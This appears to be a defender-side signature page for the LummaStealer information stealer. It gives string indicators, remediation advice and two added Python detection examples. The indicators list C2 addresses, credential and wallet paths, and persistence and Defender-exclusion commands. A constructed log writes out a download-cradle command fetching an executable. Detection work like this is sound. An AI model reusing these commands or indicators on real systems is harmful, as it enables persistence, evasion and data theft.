Concrete signature match: Trojan (appears legitimate but performs malicious actions), 32-bit Windows platform, family LummaStealer
Trojan:Win32/LummaStealer!MTB is a heuristic detection for LummaStealer, a commodity information stealer, built from the string indicators listed below. Those strings show what it collects and how it runs. It reads the Chromium "Local State" value os_crypt.encrypted_key, which is the DPAPI-protected master key needed to decrypt saved browser logins; it targets cryptocurrency wallets (Electrum, Electron Cash, Exodus, Binance, Coinomi, Jaxx, Daedalus, Bitcoin Core, DashCore and the MetaMask browser extension), mail clients (The Bat!, Pegasus), Telegram and 1Password; and it profiles the host (screen resolution, a WMI Win32_ComputerSystem query, a Screen.png capture) before posting to a /api endpoint with a "TeslaBrowser/5.5" user agent and a lid=…&j=…&ver=4.0 beacon. The loaders seen alongside it are written in Go, .NET and Rust, carry process-hollowing symbols (CreateSuspendedProcess, WriteProcessMemory, Wow64SetThreadContext, ResumeThread), install silently (/VERYSILENT /SP-, /QN /norestart), persist through Run and RunOnce keys (for example a "reg add … /v AdobeUpdater" entry), add Defender exclusions with Add-MpPreference, fetch second stages with Invoke-WebRequest from hosts on port 5554, and in some cases are packed with Oreans WinLicense/Themida (Software\WinLicense, \\.\Oreans.vxd, .taggant). A TEXTBIN.NET/raw reference points to a paste service being used as a dead drop or staging point.
Relevant strings associated with this threat:
- os_crypt.encrypted_key (PEHSTR_EXT)
- B.imports (PEHSTR_EXT)
- os_c576xedrypt.encry576xedpted_key (PEHSTR_EXT)
- Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (PEHSTR_EXT)
- fyi/Blogtion.msi (PEHSTR_EXT)
- ppCmdLine=/QN /norestart (PEHSTR_EXT)
- atomic.QSY_zrh (PEHSTR_EXT)
- - Screen Resoluton: (PEHSTR_EXT)
- TEXTBIN.NET/raw (PEHSTR_EXT)
- /VERYSILENT /SP- (PEHSTR_EXT)
- aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
- dKAoMzVdoGMRAuUpnzHLYIx.dll (PEHSTR_EXT)
- bFISQFXZrlhowSppjMcUMEWMVO.dll (PEHSTR_EXT)
- sxWsBcgMSxRdUCKXevfJKgAGAKoM.dll (PEHSTR_EXT)
- qIadkkJWSlcNQdQofhpMzxrd.dll (PEHSTR_EXT)
- LsVgHFhAfthrvrwvVQnXVYBStlK.dll (PEHSTR_EXT)
- thoseintroductory.exe (PEHSTR_EXT)
- callcustomerpro.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR_EXT)
- GPUView.pdb (PEHSTR_EXT)
- error_correction_update_check.My.Resources (PEHSTR_EXT)
- installation_solution_for_use.My.Resources (PEHSTR_EXT)
- .vuia3 (PEHSTR_EXT)
- writerfunctionpro.exe (PEHSTR_EXT)
- timeprogrammer.exe (PEHSTR_EXT)
- DelNodeRunDLL32 (PEHSTR_EXT)
- load_world.exe (PEHSTR_EXT)
- live_stream_from_cosmos_events_app.exe (PEHSTR_EXT)
- Account/Login (PEHSTR_EXT)
- WebMatrix.WebData.Resources.WebDataResources (PEHSTR_EXT)
- LoaderV1.Form1.resources (PEHSTR_EXT)
- oFYSVYzChxVsXWmRsYqu.dll (PEHSTR_EXT)
- tzYslkEExBzhWQjYATHOe.dll (PEHSTR_EXT)
- OdZokoKlJenvDbhTg.dll (PEHSTR_EXT)
- HeWSfFWuFmmMEQy.dll (PEHSTR_EXT)
- ILLnogZyZLUtVXiOvwRHpTewBNs.dll (PEHSTR_EXT)
- VioletRichPlayer364David.ZODvl (PEHSTR_EXT)
- Revolutionizing connectivity with cutting-edge cloud solutions. (PEHSTR_EXT)
- OergBcaAGPSxGICMDFJxnj (PEHSTR_EXT)
- Leading the future of integrated technology solutions. (PEHSTR_EXT)
- main.RedirectToPayload (PEHSTR_EXT)
- main.LoadPEModule (PEHSTR_EXT)
- main.GetNTHdrs (PEHSTR_EXT)
- main.AllocPEBuffer (PEHSTR_EXT)
- main.PERawToVirtual (PEHSTR_EXT)
- main.CreateSuspendedProcess (PEHSTR_EXT)
- main._LoadPEModule (PEHSTR_EXT)
- main.Resume_Thread (PEHSTR_EXT)
- main.Write_ProcessMemory (PEHSTR_EXT)
- main.Get_ThreadContext (PEHSTR_EXT)
- Intel Core Inc. Trademark (PEHSTR_EXT)
- JSylCAgIufPyrE (PEHSTR_EXT)
- <HTA:APPLICATION icon="#" WINDOWSTATE="normal" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" BORDER="none" SCROLL="no" (PEHSTR_EXT)
- window.close(); (PEHSTR_EXT)
- </script> (PEHSTR_EXT)
- tLrmzJMsrWOFWmoOxcctAcCafzA.d (PEHSTR_EXT)
- FgLHhdSuJHOQcVWHZfF.d (PEHSTR_EXT)
- main.Md5Encode (PEHSTR_EXT)
- main.EUkcKYTIDb (PEHSTR_EXT)
- main.TerminateProcess (PEHSTR_EXT)
- main.nlZMziDMqv (PEHSTR_EXT)
- main.ResumeThread (PEHSTR_EXT)
- main.WriteProcessMemory (PEHSTR_EXT)
- main.Wow64SetThreadContext (PEHSTR_EXT)
- main.GetThreadContext (PEHSTR_EXT)
- LwNOrAxUVY/main.go (PEHSTR_EXT)
- main.nwPXANdvbL (PEHSTR_EXT)
- main.qWwvfeKaCT (PEHSTR_EXT)
- JustABackDoor\obj\Debug\JustABackDoor.pdb (PEHSTR_EXT)
- JustABackDoor.Executor (PEHSTR_EXT)
- RunPowerShellCommand (PEHSTR_EXT)
- debug.g.resources (PEHSTR_EXT)
- psicologiaecultura.com.br (PEHSTR_EXT)
- if ($exeName -eq "RSGame.exe") (PEHSTR_EXT)
- main.UlhMFyDdoz (PEHSTR_EXT)
- main.AEKCihaLRV (PEHSTR_EXT)
- main.uydiOYgQCH.deferwrap2 (PEHSTR_EXT)
- main.uydiOYgQCH.deferwrap1 (PEHSTR_EXT)
- main.mOaSjsgDny.func1.Print.1 (PEHSTR_EXT)
- test_lib/main.go (PEHSTR_EXT)
- main.qHbLKcVFPY (PEHSTR_EXT)
- main.BnMWnpUycO (PEHSTR_EXT)
- main.HFdrQcLRTh (PEHSTR_EXT)
- main.HwNcTblZxJ (PEHSTR_EXT)
- main.khgzBwOcdS (PEHSTR_EXT)
- main.RDF (PEHSTR_EXT)
- main.cFVvJaclpr (PEHSTR_EXT)
- main.oepNeSmKgT (PEHSTR_EXT)
- main.cQPubDNZNj (PEHSTR_EXT)
- main.neJDPbLRWD (PEHSTR_EXT)
- main.VZCOQzehCp (PEHSTR_EXT)
- main.WjLRMuNaor (PEHSTR_EXT)
- main.EFTcmUgEtT (PEHSTR_EXT)
- main.faqLSRWRlV (PEHSTR_EXT)
- main.lnejYwfZkm (PEHSTR_EXT)
- main.iiQhNBnnfo (PEHSTR_EXT)
- main.opWGippTfg.deferwrap2 (PEHSTR_EXT)
- main.opWGippTfg.deferwrap1 (PEHSTR_EXT)
- main.KqqAVmjanJ (PEHSTR_EXT)
- main.fQyfTGPUtq (PEHSTR_EXT)
- exithook/hooks.go (PEHSTR_EXT)
- main.randSeq (PEHSTR_EXT)
- main.KwPMHzDibl (PEHSTR_EXT)
- main._Cfunc_wrf (PEHSTR_EXT)
- main._RunPE (PEHSTR_EXT)
- main. (PEHSTR_EXT)
- .deferwrap2 (PEHSTR_EXT)
- .deferwrap1 (PEHSTR_EXT)
- .func1 (PEHSTR_EXT)
- .func2 (PEHSTR_EXT)
- .func3 (PEHSTR_EXT)
- .func4 (PEHSTR_EXT)
- .func1.Print.1 (PEHSTR_EXT)
- .rsrc (PEHSTR_EXT)
- .idata (PEHSTR_EXT)
- .rsrc (PEHSTR_EXT)
- .func1.Print.func1 (PEHSTR_EXT)
- complex integrate build quick sun understand network power fast support (PEHSTR_EXT)
- =.M&o (SNID)
- database\wirefr\x64\HTTP\Intero.pdb (PEHSTR_EXT)
- .text (PEHSTR_EXT)
- `.rdata (PEHSTR_EXT)
- @.data (PEHSTR_EXT)
- .00cfg (PEHSTR_EXT)
- @.reloc (PEHSTR_EXT)
- B.open (PEHSTR_EXT)
- fequal.exe (PEHSTR_EXT)
- .taggant (PEHSTR_EXT)
- `.rsrc (PEHSTR_EXT)
- Wallets/Electrum (PEHSTR_EXT)
- Wallets/ElectronCash (PEHSTR_EXT)
- %appdata%\com.liberty.jaxx\IndexedDB (PEHSTR_EXT)
- wallets/Ethereum (PEHSTR_EXT)
- %localappdata%\Coinomi (PEHSTR_EXT)
- lid=%s&j=%s&ver=4.0 (PEHSTR_EXT)
- TeslaBrowser/5.5 (PEHSTR_EXT)
- Screen.png (PEHSTR_EXT)
- Screen Resoluton: (PEHSTR_EXT)
- POST /api HTTP/1.1 (PEHSTR_EXT)
- %appdata%\com.liberty.jaxx (PEHSTR_EXT)
- Mail Clients/TheBat (PEHSTR_EXT)
- Mail Clients/Pegasus (PEHSTR_EXT)
- Applications/Telegram (PEHSTR_EXT)
- Applications/1Password (PEHSTR_EXT)
- Wallets/Daedalus (PEHSTR_EXT)
- appdata\exodus (PEHSTR_EXT)
- appdata\binance (PEHSTR_EXT)
- get-wmiobject-classwin32_computersystem (PEHSTR_EXT)
- webextension@metamask.io (PEHSTR_EXT)
- .func6 (PEHSTR_EXT)
- .func6.1 (PEHSTR_EXT)
- .func5 (PEHSTR_EXT)
- .func5.1 (PEHSTR_EXT)
- .func4.1 (PEHSTR_EXT)
- .func3.1 (PEHSTR_EXT)
- .func2.1 (PEHSTR_EXT)
- .func8 (PEHSTR_EXT)
- .func7 (PEHSTR_EXT)
- Software\WinLicense (PEHSTR_EXT)
- tsrnKMMRWaSmgIGBadTmRDVK.dll (PEHSTR_EXT)
- EMgVkXRBlViHxiKJoGXomDnkozkr.dll (PEHSTR_EXT)
- nxtSvXVgJXelyGLBfuddwnihiSLb.dll (PEHSTR_EXT)
- wDSDpeHhJZHHlukYvJFvIbzlFEz.dll (PEHSTR_EXT)
- QrUrwtPcnxxkwnxalgzJPWVFgTlT.dll (PEHSTR_EXT)
- AfSdNM6/46ObIJJmWHHvpVJ (PEHSTR_EXT)
- Tm5McYSCxHrGi4S+xs0dRKxy+8/OKxRNXx1SEPQEI804Dz4Y8PunFang (PEHSTR_EXT)
- TextForm\obj\Debug\TextForm.pdb (PEHSTR_EXT)
- Dwasakj.Properties.Resources (PEHSTR_EXT)
- file:/// (PEHSTR_EXT)
- main.CocLYFOOoa (PEHSTR_EXT)
- main.lFDfigPOFq (PEHSTR_EXT)
- main.CONTEXT (PEHSTR_EXT)
- main.ISLAdTJUKL (PEHSTR_EXT)
- I02Op2e6ZD52OJInVolF/WhWwGUgukvawTLHcS4qp (PEHSTR_EXT)
- PWGVuoIBdb/core_injector.go (PEHSTR_EXT)
- PWGVuoIBdb/injection.go (PEHSTR_EXT)
- Charter.exe (PEHSTR_EXT)
- "p": "%appdata%\\Ethereum", (PEHSTR_EXT)
- "p": "%appdata%\\Bitcoin\wallets", (PEHSTR_EXT)
- "p": "%localappdata%\\Microsoft\\Edge\\User Data", (PEHSTR_EXT)
- "z": "Wallets/Bitcoin core", (PEHSTR_EXT)
- "z": "Wallets/DashCore", (PEHSTR_EXT)
- "n": "chrome.exe", (PEHSTR_EXT)
- @.idata (PEHSTR_EXT)
- aeblfdkhhhdcdjpifhhbdiojplfjncoa (PEHSTR_EXT)
- src\executable_loader.rs (PEHSTR)
- WinHttpWriteData (PEHSTR_EXT)
- powershell -Command "Add-MpPreference -ExclusionPath (PEHSTR_EXT)
- powershell -Command "Invoke-WebRequest -Uri (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb (PEHSTR_EXT)
- /.exe" -Force (PEHSTR_EXT)
- ExecutionPolicyRead after Close (PEHSTR_EXT)
- 127.0.0.1:53 (PEHSTR_EXT)
- Command (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- Js) (SNID)
- reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AdobeUpdater /t REG_SZ /d "%s" /f (PEHSTR_EXT)
- cmd.exe /c (PEHSTR_EXT)
- %userappdata%\RestartApp.exe (PEHSTR_EXT)
- \\.\Oreans.vxd (PEHSTR_EXT)
- .idata (PEHSTR_EXT)
- SOFTWARE\WinLicense (PEHSTR_EXT)
- /61GM (SNID)
- Realtek_HD_Audio_Universal_Service_Driver.exe (PEHSTR_EXT)
- -NoProfile -ExecutionPolicy Bypass -Command " (PEHSTR_EXT)
- p://141.98.6.130:5554/ (PEHSTR_EXT)
- .exe (PEHSTR_EXT)
- p://84.21.189.22:5554/ (PEHSTR_EXT)
- DownloaderApp.exe (PEHSTR_EXT)
- .svG (SNID)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
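How a PE string heuristic like this one turns individual string hits into a verdict is easier to see in code. The Python below is an added example, not Microsoft's signature logic and not code from any Lumma sample: it searches a file for a subset of the strings listed above in both ASCII and UTF-16LE form (the encoding .NET and Rust binaries often use for their string tables), gives each hit a weight, and flags the file once the weighted total crosses a threshold. The weights, the threshold and the SAMPLE/BENIGN blobs are this example's own assumptions.

```python
"""Weighted string-indicator scan for LummaStealer!MTB-style indicators.

Added example, not Microsoft's signature or any sample's code. Each indicator
below is copied from the string list on this page; the weights, threshold and
the SAMPLE/BENIGN blobs are this example's assumptions. A PE string heuristic
also looks for UTF-16LE copies (the way .NET and Rust binaries often store
strings), so both encodings are searched.
"""
import sys
from dataclasses import dataclass

INDICATORS = {
    # Chromium Local State key needed to decrypt saved browser logins
    "os_crypt.encrypted_key": 3,
    # Lumma system profile and C2 beacon format
    "Screen Resoluton:": 2,
    "lid=%s&j=%s&ver=4.0": 4,
    "TeslaBrowser/5.5": 4,
    "POST /api HTTP/1.1": 1,
    # wallet and password-manager targets
    "Wallets/Electrum": 2,
    "webextension@metamask.io": 2,
    "Applications/1Password": 2,
    # persistence and defence evasion (weak alone: legitimate installers use them too)
    "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce": 1,
    'powershell -Command "Add-MpPreference -ExclusionPath': 3,
    "-NoProfile -ExecutionPolicy Bypass -Command": 2,
    # process-hollowing symbols from the Go loader
    "main.CreateSuspendedProcess": 2,
    "main.Wow64SetThreadContext": 2,
    "main.Write_ProcessMemory": 2,
}
THRESHOLD = 6  # assumed: one generic string must never convict a file on its own


@dataclass(frozen=True)
class Hit:
    indicator: str
    encoding: str
    offset: int
    weight: int


def scan_bytes(data: bytes) -> list[Hit]:
    """Find every indicator in ASCII and UTF-16LE form; report each occurrence."""
    hits = []
    for text, weight in INDICATORS.items():
        for enc in ("ascii", "utf-16-le"):
            off = data.find(text.encode(enc))
            if off != -1:
                hits.append(Hit(text, enc, off, weight))
    return hits


def score(hits: list[Hit]) -> int:
    """Sum weights, counting an indicator once even if both encodings matched."""
    return sum({h.indicator: h.weight for h in hits}.values())


def verdict(data: bytes) -> tuple[bool, int, list[Hit]]:
    hits = scan_bytes(data)
    total = score(hits)
    return total >= THRESHOLD, total, hits


# Constructed blobs standing in for a stealer build and a benign program.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 64
    + b"os_crypt.encrypted_key\x00"
    + "TeslaBrowser/5.5".encode("utf-16-le") + b"\x00\x00"
    + b"lid=%s&j=%s&ver=4.0\x00"
)
BENIGN = (
    b"MZ\x90\x00" + b"\x00" * 64
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\x00"
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    flagged, total, hits = verdict(data)
    for h in sorted(hits, key=lambda h: h.offset):
        print(f"{h.offset:#010x} {h.encoding:9} +{h.weight} {h.indicator}")
    print(f"score={total} threshold={THRESHOLD} -> {'FLAGGED' if flagged else 'clean'}")
```

Run it with a file path to scan a real binary, or with no arguments to scan the embedded blob. The point of the weighting is visible in the BENIGN case: a RunOnce path alone scores 1 and stays clean, while the C2 beacon format and user agent together clear the threshold without any persistence string at all.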
SHA-256: 4a8b1df1313336b9650cab4da715a8cf2910caca7e8d98faed12ce9a8f6538f9

Isolate the infected system from the network immediately. Perform a full system scan with updated antivirus software to remove all detected threats, and check the Run and RunOnce keys and the Defender exclusion list for entries the loader may have added. Crucially, treat every credential, browser session cookie and cryptocurrency wallet stored on the host as compromised: change all critical passwords (email, banking, social media, work accounts) from a clean device after remediation, revoke active sessions (including Telegram), and move any wallet funds to fresh keys.
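Before re-imaging, the persistence and defence-evasion commands visible in the string set (Add-MpPreference -ExclusionPath, reg add to the Run key, -NoProfile -ExecutionPolicy Bypass, an Invoke-WebRequest download cradle, /QN /norestart and /VERYSILENT /SP- silent installs) are worth hunting for in process-creation telemetry, because they show whether the loader actually ran and what else it dropped. The Python below is an added example, not part of the original page: it applies regex rules derived from those strings to a few constructed Sysmon-style Event ID 1 records (UTC time, Image, CommandLine, tab-separated). The log lines, the "victim" user and the 203.0.113.10 address are constructed for the example, not real telemetry.

```python
"""Hunt process-creation logs for the LummaStealer loader commands.

Added example (not from the original signature page). The regex rules are
derived from command strings in the signature; the log lines are constructed
Sysmon-style Event ID 1 records (UTC time, Image, CommandLine, tab-separated)
and 203.0.113.10 is a documentation address, not a real C2.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    severity: str
    pattern: re.Pattern


RULES = [
    # Defender exclusion for the drop folder (defence evasion)
    Rule("defender-exclusion", "high",
         re.compile(r"Add-MpPreference\s+-ExclusionPath\b", re.I)),
    # Run / RunOnce key written with reg.exe (persistence)
    Rule("run-key-persistence", "high",
         re.compile(r"\breg(?:\.exe)?\s+add\s+\"?HK(?:CU|LM)\\Software\\Microsoft"
                    r"\\Windows\\CurrentVersion\\Run(?:Once)?\b", re.I)),
    # PowerShell launched with profile and execution-policy bypass
    Rule("powershell-bypass", "medium",
         re.compile(r"-NoProfile\s+-ExecutionPolicy\s+Bypass\b", re.I)),
    # second-stage download (the signature strings show port 5554 hosts)
    Rule("download-cradle", "high",
         re.compile(r"Invoke-WebRequest\s+-Uri\s+[\"']?https?://\S+", re.I)),
    # silent installer switches used by the droppers
    Rule("silent-installer", "low",
         re.compile(r"/QN\s+/norestart\b|/VERYSILENT\s+/SP-", re.I)),
]


def parse(line: str) -> tuple[str, str, str]:
    """Split a tab-separated 'time<TAB>Image<TAB>CommandLine' record."""
    ts, image, cmdline = line.rstrip("\n").split("\t", 2)
    return ts, image, cmdline


def detect(line: str) -> list[tuple[str, str, str, str]]:
    """Return (time, image, rule, severity) for every rule the command line matches."""
    ts, image, cmdline = parse(line)
    return [(ts, image, r.name, r.severity) for r in RULES if r.pattern.search(cmdline)]


def run(lines) -> list[tuple[str, str, str, str]]:
    alerts = []
    for line in lines:
        alerts.extend(detect(line))
    return alerts


# Constructed records; one attack chain plus one benign explorer launch.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LOG = ["\t".join(rec) for rec in [
    ("2024-05-01T10:00:01Z", PS,
     r'powershell -Command "Add-MpPreference -ExclusionPath C:\Users\victim\AppData\Roaming"'),
    ("2024-05-01T10:00:02Z", r"C:\Windows\System32\reg.exe",
     r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AdobeUpdater '
     r'/t REG_SZ /d "C:\Users\victim\AppData\Roaming\RestartApp.exe" /f'),
    ("2024-05-01T10:00:03Z", PS,
     r'powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri '
     r'http://203.0.113.10:5554/DownloaderApp.exe -OutFile C:\Users\victim\AppData\Roaming\DownloaderApp.exe"'),
    ("2024-05-01T10:00:04Z", r"C:\Windows\System32\msiexec.exe",
     r"msiexec /i setup.msi /QN /norestart"),
    ("2024-05-01T10:00:05Z", r"C:\Windows\explorer.exe",
     r"explorer.exe C:\Users\victim\Documents"),
]]

if __name__ == "__main__":
    for ts, image, rule, sev in run(LOG):
        print(f"{ts} [{sev:6}] {rule:20} {image}")
```

The silent-installer rule is deliberately low severity: /QN and /VERYSILENT are normal for software deployment, so it only matters when it lands on the same host and in the same few seconds as a Defender exclusion or a Run-key write, which is the sequence the constructed log shows.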